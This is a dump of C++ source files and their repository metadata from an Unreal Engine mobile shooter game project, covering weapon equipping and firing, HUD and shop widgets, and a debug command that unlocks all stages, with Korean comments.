TEST_CODE\nvoid APG_MyChar::WeaponEquipRlife()\n{\n\tauto Weapon = LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_Rifle.BP_Weapon_Rifle_C'\"));\n\tABCHECK(EquipWeapon(0));\n}\n\nvoid APG_MyChar::WeaponEquipFlame()\n{\n\tauto Weapon = LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_FlameGun.BP_Weapon_FlameGun_C'\"));\n\tABCHECK(EquipWeapon(1));\n}\n\nvoid APG_MyChar::WeaponEquipShutgun()\n{\n\tauto Weapon = LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_ShotGun.BP_Weapon_ShotGun_C'\"));\n\tABCHECK(EquipWeapon(2));\n}\n\nvoid APG_MyChar::WeaponEquipLaserBeam()\n{\n\tauto Weapon = LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_LaserBemGun.BP_Weapon_LaserBemGun_C'\"));\n\tABCHECK(EquipWeapon(3));\n}\n\nvoid APG_MyChar::WeaponEquipGrandleLauncher()\n{\n\tauto Weapon = LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_GraenadeLauncher.BP_Weapon_GraenadeLauncher_C'\"));\n\tABCHECK(EquipWeapon(4));\n}\n#endif // TEST_CODE\n\nbool APG_MyChar::EquipWeapon(int32 nWeaponTalbeIndex)\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(nWeaponTalbeIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\tAPG_Weapon* NewWeapon = GetWorld()->SpawnActor<APG_Weapon>(pWeaponTableData->BPWeapon, FVector::ZeroVector, FRotator::ZeroRotator);\n\tABCHECK(nullptr != NewWeapon, false);\n\n\tif (NewWeapon->SetWeaponData(nWeaponTalbeIndex) && false == SetWeapon(NewWeapon))\n\t{\n\t\tABLOG(Error, TEXT(\"SetWeapon Failed!! (TableIndex : %d)\"), nWeaponTalbeIndex);\n\t\tNewWeapon->Destroy();\n\t\tNewWeapon = nullptr;\n\n\t\treturn false;\n\t}\n\n\treturn true;\n}\n\n// PlayerState 로 옮기는 작업 필요\nbool APG_MyChar::SetWeapon(APG_Weapon* NewWeapon)\n{\n\tif (CurrentWeapon.IsValid(true))\n\t{\n\t\tABLOG(Warning, TEXT(\"Unequip Weapon : %s\"), *CurrentWeapon->GetName());\n\n\t\tCurrentWeapon->DetachFromActor(FDetachmentTransformRules::KeepWorldTransform);\n\t\tCurrentWeapon->Destroy();\n\t\tCurrentWeapon = nullptr;\n\t}\n\n\tif (NewWeapon)\n\t{\n\t\tFName CharacterGunSocket(TEXT(\"Bip001-L-GunSocket\"));\n\t\tNewWeapon->AttachToComponent(GetMesh(), FAttachmentTransformRules::SnapToTargetNotIncludingScale, CharacterGunSocket);\n\t\tNewWeapon->SetOwner(this);\n\t\tCurrentWeapon = NewWeapon;\n\t\tABAnimInstance->SetMontageFireReaction(CurrentWeapon->GetMontageFireReaction());\n\n\t\tABLOG(Warning, TEXT(\"Equip Weapon : %s\"), *NewWeapon->GetName());\n\t}\n\n\treturn true;\n}\n\n// APG_Weapon 으로 함수 옮기는 작업 필요.\nAPG_MonChar* APG_MyChar::FindTargetToMonster()\n{\n\tAPG_MonChar* pFindTarget = nullptr;\n\t// 캐릭터 시야 내 주변 몬스터를 찾아 공격 애니메이션을 실행한다.\n\t// 실제 총알 발사는 공격 애니메이션의 애님 노티파이를 이용한다.\n\tif (CurrentWeapon.IsValid(true))\n\t{\n\t\tfloat fAttackRange = CurrentWeapon->GetAttackRange();\n\n\t\tTArray<FHitResult> HitResult;\n\t\tFCollisionQueryParams Params(NAME_None, false, this);\n\t\t\n\t\tbool bResult = GetWorld()->SweepMultiByChannel(\n\t\t\tHitResult,\n\t\t\tGetActorLocation(),\n\t\t\tGetActorLocation(),\n\t\t\tFQuat::Identity,\n\t\t\tECollisionChannel::ECC_GameTraceChannel4,\n\t\t\tFCollisionShape::MakeSphere(fAttackRange),\n\t\t\tParams);\n\n//#ifdef ENABLE_DRAW_DEBUG\n//\t\tFVector TraceVec = GetActorForwardVector() * fAttackRange;\n//\t\tFVector Center = GetActorLocation();\n//\t\tfloat HalfHeight = fAttackRange;\n//\t\tFQuat CapsuleRot = FRotationMatrix::MakeFromZ(TraceVec).ToQuat();\n//\t\tFColor DrawColor = bResult ? FColor::Green : FColor::Red;\n//\t\tfloat DebugLifeTime = 0.02f;\n//\n//\t\tDrawDebugCapsule(GetWorld(),\n//\t\t\tCenter,\n//\t\t\tHalfHeight,\n//\t\t\tfAttackRange,\n//\t\t\tCapsuleRot,\n//\t\t\tDrawColor,\n//\t\t\tfalse,\n//\t\t\tDebugLifeTime);\n//#endif\n\n\t\tif (bResult)\n\t\t{\n\t\t\t// 캐릭터로부터 가장 가까운 몬스터를 찾아 타겟으로 정한다.\n\t\t\tfloat fFindNearDistance = fAttackRange;\n\t\t\tfor (auto Monster : HitResult)\n\t\t\t{\n\t\t\t\tif (nullptr == Monster.GetActor())\n\t\t\t\t\tcontinue;\n\n\t\t\t\tfloat fDistance = GetDistanceTo(Monster.GetActor());\n\t\t\t\tif (fDistance < fFindNearDistance)\n\t\t\t\t{\n\t\t\t\t\tfFindNearDistance = fDistance;\n\t\t\t\t\tpFindTarget = Cast<APG_MonChar>(Monster.GetActor());\n\t\t\t\t}\n\t\t\t}\n//#ifdef ENABLE_DRAW_DEBUG\n//\t\t\tif (pFindTarget)\n//\t\t\t{\n//\t\t\t\tDrawDebugPoint(GetWorld(), pFindTarget->GetActorLocation(), 10.0f, FColor::Yellow, false, 0.02f);\n//\t\t\t\tDrawDebugLine(GetWorld(), GetActorLocation(), pFindTarget->GetActorLocation(), FColor::Yellow, false, 0.02f);\n//\t\t\t}\n//#endif\n\t\t}\n\t}\n\n\treturn pFindTarget;\n}\n\nbool APG_MyChar::IsTargetMonster()\n{\n\tABCHECK(nullptr != ABAnimInstance, false);\n\treturn ABAnimInstance->IsVaildTargetMonster();\n}" }, { "alpha_fraction": 0.7132353186607361, "alphanum_fraction": 0.716911792755127, "avg_line_length": 21.75, "blob_id": "444b7a9fd0192ff348a4a4ce6d1ab454f3125bd9", "content_id": "de0b5341292e2d0eed3ee36d3e1ab7a04ec22608", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 378, "license_type": "no_license", "max_line_length": 79, "num_lines": 12, "path": "/Source/Project_Gun/Public/Character/PG_CharDefine.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\nUENUM(BlueprintType)\nenum class ECharacterState : uint8\n{\n\tPREINIT,\t// 캐릭터 생선 전의 스테이트\n\tLOADING,\t// 선택한 캐릭터 애셋을 로딩하는 스테이트\n\tREADY,\t\t// 캐릭터 애셋 로딩이 완료된 스테이트\n\tDEAD\t\t// 캐릭터 사망 스테이트\n};" }, { "alpha_fraction": 0.6067638993263245, "alphanum_fraction": 0.6094164252281189, "avg_line_length": 25.928571701049805, "blob_id": "9a66056b743ab12c3540edfe2ade023dac6fb6b2", "content_id": "ade71ef4594a358482a0ca4239f0a3ffd337af8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1632, "license_type": "no_license", "max_line_length": 95, "num_lines": 56, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetShop.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetShop.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetShop : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\n\tenum\n\t{\t\n\t\t// 사용하지 않도록 개선 예정\n\t\teMaxLethalShopItemSlot = 3,\t\t// 필살기 \n\t\teMaxWeaponShopItemSlot = 5,\t\t// 무기\n\t};\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\tvirtual void NativeTick(const FGeometry& MyGeometry, float DeltaTime) override;\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateLethalShopLayout();\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateWeaponShopLayout();\n\tUFUNCTION(BlueprintImplementableEvent, Category = \"RewardPoint\")\n\tvoid UpdateRewardPoint();\n\n\tvoid SetBtnEnableAD(bool bEnable);\n\tvoid SetADRemainTime(int32 nTime);\n\npublic :\n\t//============================================================================================\n\t// 광고 시청에 대한 결과\n\t//============================================================================================\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADRewardVideoSucessed();\t\t// 유저가 보상형 광고를 성공적으로 보았음\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADRewardVideoClosed();\t\t// 유저가 보상형 광고 보는중 닫거나 실패하였음\n\t//============================================================================================\n\n\tUPROPERTY()\n\tclass UButton* m_pBtn_ADView;\n\n\t//UPROPERTY()\n\t//class UTextBlock* Text_ADRemainTime;\n\tPG_WIDGET_DECLAR(UTextBlock, Text_ADRemainTime);\n};\n" }, { "alpha_fraction": 0.765527606010437, "alphanum_fraction": 0.765527606010437, "avg_line_length": 35.645668029785156, "blob_id": "acf0c7366ffd23439f41d714a712f179eb81bf1f", "content_id": "512bfe1ad93d1a9ed112b07fc1982b239d2ff25c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4655, "license_type": "no_license", "max_line_length": 164, "num_lines": 127, "path": "/Source/Project_Gun/Private/UI/PG_HUDBattleStage.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_HUDBattleStage.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n\n#include <Components/TextBlock.h>\n#include <Components/Button.h>\n\nvoid UPG_HUDBattleStage::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tStageTimer = Cast<UTextBlock>(GetWidgetFromName(TEXT(\"StageTimer\")));\n\tABCHECK(nullptr != StageTimer);\n\n\tRewardPoint = Cast<UTextBlock>(GetWidgetFromName(TEXT(\"RewardPoint\")));\n\tABCHECK(nullptr != RewardPoint);\n\n\tLethalAttack = Cast<UTextBlock>(GetWidgetFromName(TEXT(\"LethalAttack\")));\n\tABCHECK(nullptr != LethalAttack);\n\n\tBtn_Rifle = Cast<UButton>(GetWidgetFromName(TEXT(\"Btn_Rifle\")));\n\tABCHECK(nullptr != Btn_Rifle);\n\n\tBtn_Flame = Cast<UButton>(GetWidgetFromName(TEXT(\"Btn_Flame\")));\n\tABCHECK(nullptr != Btn_Flame);\n\n\tBtn_Shutgun = Cast<UButton>(GetWidgetFromName(TEXT(\"Btn_Shutgun\")));\n\tABCHECK(nullptr != Btn_Shutgun);\n\n\tBtn_Laser = Cast<UButton>(GetWidgetFromName(TEXT(\"Btn_Laser\")));\n\tABCHECK(nullptr != Btn_Laser);\n\n\tBtn_Grandle = Cast<UButton>(GetWidgetFromName(TEXT(\"Btn_Grandle\")));\n\tABCHECK(nullptr != Btn_Grandle);\n}\n\nvoid UPG_HUDBattleStage::BindPlayerState(APG_MyPlayerState* APlayerState)\n{\n\tABCHECK(nullptr != APlayerState);\n\n\tAPlayerState->OnTryUseTheLethalAttack.AddUObject(this, &UPG_HUDBattleStage::UpdateLethalAttack);\n\tAPlayerState->OnUseTheLethalAttackFail.AddUObject(this, &UPG_HUDBattleStage::UpdateLethalAttack);\n\t//APlayerState->OnAddRewardPoint.AddUObject(this, &UPG_HUDBattleStage::UpdateRewardPoint);\n\n\tauto GameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (GameStateStage)\n\t\tGameStateStage->StageTimerDelegate.AddUObject(this, &UPG_HUDBattleStage::UpdateStageTimer);\n\n\n\tBtn_Rifle->OnPressed.AddDynamic(this, &UPG_HUDBattleStage::OnBtnRifle);\n\tBtn_Flame->OnPressed.AddDynamic(this, &UPG_HUDBattleStage::OnBtnFlame);\n\tBtn_Shutgun->OnPressed.AddDynamic(this, &UPG_HUDBattleStage::OnBtnShutgun);\n\tBtn_Laser->OnPressed.AddDynamic(this, &UPG_HUDBattleStage::OnBtnLaser);\n\tBtn_Grandle->OnPressed.AddDynamic(this, &UPG_HUDBattleStage::OnBtnGrandle);\n}\n\nvoid UPG_HUDBattleStage::UpdateStageTimer()\n{\n\tABCHECK(nullptr != StageTimer);\n\n\tauto GameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != GameStateStage);\n\n\tFString TextTimer = FString::Printf(TEXT(\"Time : %d\"), GameStateStage->GetRemainStageTimer());\n\tStageTimer->SetText(FText::FromString(TextTimer));\n}\n\nvoid UPG_HUDBattleStage::UpdateRewardPoint()\n{\n\tABCHECK(nullptr != RewardPoint);\n\n\tauto MyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\tif (MyPlayerState)\n\t{\n\t\tFString TextRewardPoint = FString::Printf(TEXT(\"RP : %d\"), MyPlayerState->GetRewardPoint());\n\t\tRewardPoint->SetText(FText::FromString(TextRewardPoint));\n\t}\n}\n\nvoid UPG_HUDBattleStage::UpdateLethalAttack()\n{\n\tABCHECK(nullptr != LethalAttack);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (pGameStateStage)\n\t{\n\t\tFString TextLethalAttack = FString::Printf(TEXT(\"Lethal Kill : %d\"), pGameStateStage->GetMaxLethalKill());\n\t\tLethalAttack->SetText(FText::FromString(TextLethalAttack));\n\t}\n}\n\nvoid UPG_HUDBattleStage::OnBtnRifle()\n{\n\t//auto MyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\t//if (MyPlayerState)\n\t//\tMyPlayerState->ChangeWeapon(LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_Rifle.BP_Weapon_Rifle_C'\")));\n}\n\nvoid UPG_HUDBattleStage::OnBtnFlame()\n{\n\t//auto MyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\t//if (MyPlayerState)\n\t//\tMyPlayerState->ChangeWeapon(LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_FlameGun.BP_Weapon_FlameGun_C'\")));\n}\n\nvoid UPG_HUDBattleStage::OnBtnShutgun()\n{\n\t//auto MyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\t//if (MyPlayerState)\n\t//\tMyPlayerState->ChangeWeapon(LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_ShotGun.BP_Weapon_ShotGun_C'\")));\n}\n\nvoid UPG_HUDBattleStage::OnBtnLaser()\n{\n\t//auto MyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\t//if (MyPlayerState)\n\t//\tMyPlayerState->ChangeWeapon(LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_LaserBemGun.BP_Weapon_LaserBemGun_C'\")));\n}\n\nvoid UPG_HUDBattleStage::OnBtnGrandle()\n{\n\t//auto MyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\t//if (MyPlayerState)\n\t//\tMyPlayerState->ChangeWeapon(LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_GraenadeLauncher.BP_Weapon_GraenadeLauncher_C'\")));\n}" }, { "alpha_fraction": 0.6150510907173157, "alphanum_fraction": 0.6169092655181885, "avg_line_length": 25.685951232910156, "blob_id": "912641ecfcca180169d5b93c393ad9ae2303c34e", "content_id": "d25c58b74e693b47659703a3fcbd161b17207742", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3323, "license_type": "no_license", "max_line_length": 80, "num_lines": 121, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetMainLobby_Renewal.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetMainLobby_Renewal.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetMainLobby_Renewal : public UUserWidget\n{\n\tGENERATED_BODY()\n\n\tenum\n\t{\n\t\teMaxWeaponSlot = PG_MAX_WEAPON_SLOT,\n\t};\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateLayoutStage();\n\t// 선택된 스테이지 미션 업데이트\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateLayoutMission();\n\t// 무기 슬롯 갱신\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateLayoutWeaponSlot();\n\t// 포인트 갱신\n\tUFUNCTION(BlueprintImplementableEvent)\n\tvoid UpdateRewardPoint();\n\npublic :\n\t// 옵션\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnOption();\n\n\t// 스테이지 선택\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnSelectStageNext();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnSelectStagePrev();\n\t\n\t// 게임시작\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnGameStart();\n\n\t// 무기고\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnShop();\n\n\t// 무기 선택\n\tUFUNCTION()\n\tvoid OnOpenWeaponInventory(int32 nSlotIndex);\n\tUFUNCTION()\n\tvoid OnCloseWeaponInventory(int32 nSlotIndex, int32 nWeaponIndex);\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnDoNotChangeCloseWeaponInventory();\n\npublic:\n\t//===========================================\n\t// Canvas TopMenu\n\t//===========================================\n\t//PG_WIDGET_DECLAR(UUserWidget, WB_RewardPoint);\n\tPG_WIDGET_DECLAR(UButton, BtnOption);\n\t\n\t//===========================================\n\t// Canvas StageSelect\n\t//===========================================\n\tPG_WIDGET_DECLAR(UButton, BtnSelectStagePrev);\n\tPG_WIDGET_DECLAR(UButton, BtnSelectStageNext);\n\tPG_WIDGET_DECLAR(UTextBlock, TextSelectedStage);\n\tPG_WIDGET_DECLAR(UCanvasPanel, CanvasSelectStageLock);\n\t\n\n\t//===========================================\n\t// Canvas Mission\n\t//===========================================\n\tPG_WIDGET_DECLAR(UButton, BtnFlag);\n\tPG_WIDGET_DECLAR(UButton, BtnLethal);\n\tPG_WIDGET_DECLAR(UButton, BtnTime);\n\tPG_WIDGET_DECLAR(UTextBlock, TextMainLobbyFlag);\n\tPG_WIDGET_DECLAR(UTextBlock, TextMainLobbyLethal);\n\tPG_WIDGET_DECLAR(UTextBlock, TextMainLobbyTime);\n\n\t//===========================================\n\t// Canvas MenuButtons\n\t//===========================================\n\tPG_WIDGET_DECLAR(UButton, BtnGameStart);\n\tPG_WIDGET_DECLAR(UButton, BtnShop);\n\tPG_WIDGET_DECLAR(UCanvasPanel, CanvasGameStart);\n\t\n\n\t//===========================================\n\t// Canvas WeaponBox\n\t//===========================================\n\tPG_WIDGET_DECLAR_TArray(UPG_UserWidgetWeaponBox, WB_WeaponBox);\n\n\t//===========================================\n\t// Canvas ADBanner\n\t//===========================================\n\n\t//===========================================\n\t// Canvas WB_WeaponInventory \n\t//===========================================\n\tPG_WIDGET_DECLAR(UScaleBox, ScaleWeaponInventory);\n\tPG_WIDGET_DECLAR(UPG_UserWidgetWeaponInventory, WB_WeaponInventory);\n\npublic :\n\t// 무기고\n\tUPROPERTY(EditAnywhere, BlueprintReadOnly, Category = \"PG Setting WidgetClass\")\n\tTSubclassOf <class UPG_UserWidgetScreenShop> WB_ShopClass;\n\tUPROPERTY()\n\tclass UPG_UserWidgetScreenShop* m_pWBShop = nullptr;\n};\n" }, { "alpha_fraction": 0.742168664932251, "alphanum_fraction": 0.7427710890769958, "avg_line_length": 24.55384635925293, "blob_id": "08043936a7878a8ade1f4f43ec5bcd3b7219e21c", "content_id": "811a5ba993540eb46d7cd98b05347e3240944782", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1762, "license_type": "no_license", "max_line_length": 113, "num_lines": 65, "path": "/Source/Project_Gun/Private/BlueScriptObject/Weapon/PG_WeaponRifle.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Weapon/PG_WeaponRifle.h\"\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include <Engine/StaticMeshSocket.h>\n\n\nAPG_WeaponRifle::APG_WeaponRifle()\n{\n}\n\nvoid APG_WeaponRifle::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tif (FiringEffect)\n\t{\n\t\tFName SocketFire(TEXT(\"Socket_FiringEffect\"));\n\t\tFiringEffect->AttachToComponent(Weapon, FAttachmentTransformRules::SnapToTargetNotIncludingScale, SocketFire);\n\t\tFiringEffect->SetActive(false, true);\n\t}\n}\n\nvoid APG_WeaponRifle::Fire()\n{\n\tFName SocketFire(TEXT(\"Socket_Fire_0\"));\n\t// 프로젝타일 발사를 시도합니다.\n\tFVector\t\tvLocation = Weapon->GetSocketLocation(SocketFire);\n\tFRotator\trRotation = Weapon->GetSocketRotation(SocketFire);\n\tUWorld*\t\tWorld = GetWorld();\n\tif (World)\n\t{\n\t\tFActorSpawnParameters SpawnParams;\n\t\tSpawnParams.Owner = this;\n\t\tSpawnParams.Instigator = GetInstigator();\n\n\t\t// 총구 위치에 발사체를 스폰시킵니다.\t\t\n\t\tauto Projectile = World->SpawnActor<APG_Projectile>(WeaponData.BProjectile, vLocation, rRotation, SpawnParams);\n\t\tif (Projectile)\n\t\t{\n\t\t\t// 발사 방향을 알아냅니다.\n\t\t\tFVector LaunchDirection = rRotation.Vector();\n\n\t\t\t// 몬스터가 사용하는 무기 여부\n\t\t\tbool bMonsterWeapon = (nullptr != Cast<APG_MonChar>(GetOwner()));\n\n\t\t\tProjectile->FireInDirection(GetWeaponData(), LaunchDirection, bMonsterWeapon);\n\t\t}\n\t}\n\n\tif (FiringEffect && false == FiringEffect->IsActive())\n\t\tFiringEffect->SetActive(true, true);\n\n\tif (FireSound)\n\t\tFireSound->Play();\n\n}\n\nvoid APG_WeaponRifle::StopFire()\n{\n\tif (FiringEffect && FiringEffect->IsActive())\n\t\tFiringEffect->SetActive(false);\n}" }, { "alpha_fraction": 0.7487373948097229, "alphanum_fraction": 0.75, "avg_line_length": 19.30769157409668, "blob_id": "e21bd18cc08f6cdce0a6488206c70d058c85d951", "content_id": "8b970745126cd81196dad85024c623b439851c0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 838, "license_type": "no_license", "max_line_length": 91, "num_lines": 39, "path": "/Source/Project_Gun/Public/BlueScriptObject/Weapon/PG_WeaponShotgun.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n\n#include \"PG_WeaponShotgun.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_WeaponShotgun : public APG_Weapon\n{\n\tGENERATED_BODY()\n\t\n\tenum \n\t{\n\t\teMax_ShotgunProjectile = 5,\t// 샷건 발사시 동시에 발사되는 탄약 개수\n\t};\n\t\npublic:\n\tAPG_WeaponShotgun();\n\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void Destroyed() override;\n\t\npublic:\n\tvirtual void Fire() override;\n\tvirtual void StopFire() override;\n\nprivate:\n\tUPROPERTY()\n\tclass APG_Projectile* CurrFireShutgun;\t\t// 현재 쏘고있는 Shutgun Projectile\n\n\tUFUNCTION()\n\tvirtual void OnFiringEffectEndParticle(UParticleSystemComponent* ParticleSystemComponent);\n};\n" }, { "alpha_fraction": 0.7171339392662048, "alphanum_fraction": 0.7196261882781982, "avg_line_length": 21, "blob_id": "b93b7742dd205ad4cecccfecc14083acf42aac38", "content_id": "bdf3033ebceaccd040eb01a35ee1beeec614c7da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1607, "license_type": "no_license", "max_line_length": 79, "num_lines": 73, "path": "/Source/Project_Gun/Private/Game/Console/Commands/PG_CommandAllStageUnlock.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n#include \"Game/Console/Commands/PG_CommandAllStageUnlock.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\nPG_CommandAllStageUnlock::PG_CommandAllStageUnlock()\n{\n}\n\nPG_CommandAllStageUnlock::~PG_CommandAllStageUnlock()\n{\n}\n\n\nvoid PG_CommandAllStageUnlock::UpdateCommand()\n{\n\tif (bOnCommand)\n\t{\n\t\tbOnCommand = false;\n\t\tExcute();\n\t}\n}\n\nvoid PG_CommandAllStageUnlock::Excute()\n{\n\tABCHECK(nullptr != G_PGWorld);\n\tABCHECK(nullptr != m_pConsoleVariable);\n\n\tint32 nGetVar = m_pConsoleVariable->GetInt();\n\tif (1 != nGetVar)\n\t\treturn;\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(G_PGWorld->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pGameModeBase = Cast<APG_GameModeBase>(G_PGWorld->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeBase);\n\n\tTArray<const FPGStageData*> kStageDatas;\n\tif (false == pGameInstance->GetAllTableStageData(kStageDatas))\n\t{\n\t\tABLOG_S(Error);\n\t\treturn;\n\t}\n\n\tint nStageID = 1;\n\tfor (auto StageData : kStageDatas)\n\t{\n\t\tif (pGameModeBase->IsFirstPlayStage(nStageID))\n\t\t{\n\t\t\tif (false == pGameModeBase->SetSelectSaveStageData(nStageID))\n\t\t\t{\n\t\t\t\tABLOG(Error, TEXT(\"ChangeSelectStageData Error : %d\"), nStageID++);\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t\tif (false == pGameModeBase->SaveStageData())\n\t\t\t{\n\t\t\t\tABLOG(Error, TEXT(\"SaveStageData Error : %d\"), nStageID++);\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t}\n\n\t\t++nStageID;\n\t}\n}\n\nvoid PG_CommandAllStageUnlock::OnChangeCommand()\n{\n\tABCHECK(nullptr != m_pConsoleVariable);\n\tbOnCommand = true;\n}" }, { "alpha_fraction": 0.7456339597702026, "alphanum_fraction": 0.7479916214942932, "avg_line_length": 30.72576141357422, "blob_id": "03c8f9c6c4786e1bce7fd926574e619a4b7e74ee", "content_id": "d981ec56e1d145444f3303e9699705f82eb7d53f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 11544, "license_type": "no_license", "max_line_length": 217, "num_lines": 361, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetScreenStageClear.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetScreenStageClear.h\"\n#include \"UI/PG_UserWidgetMessagePopup.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n#include <Components/Image.h>\n\nvoid UPG_UserWidgetScreenStageClear::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tPG_WIDGET_LINK(UTextBlock, TextTitle);\n\t//===================================================\n\t// Canvas MissionState\n\t//===================================================\n\tPG_WIDGET_LINK(UButton, BtnFlag);\n\tPG_WIDGET_LINK(UImage, ImgIconFlagPrice);\n\tPG_WIDGET_LINK(UTextBlock, TextFlagPoint);\n\tPG_WIDGET_LINK(UButton, BtnLethal);\n\tPG_WIDGET_LINK(UImage, ImgIconLethalPrice);\n\tPG_WIDGET_LINK(UTextBlock, TextLethalPoint);\n\tPG_WIDGET_LINK(UButton, BtnTime);\n\tPG_WIDGET_LINK(UImage, ImgIconTimePrice);\n\tPG_WIDGET_LINK(UTextBlock, TextTimePoint);\n\n\t//===================================================\n\t// CanvasClearPointList\n\t//===================================================\n\tPG_WIDGET_LINK(UTextBlock, TextStageClearPoint);\t\t\n\tPG_WIDGET_LINK(UTextBlock, TextMonsterKillPoint);\t\t\n\tPG_WIDGET_LINK(UTextBlock, 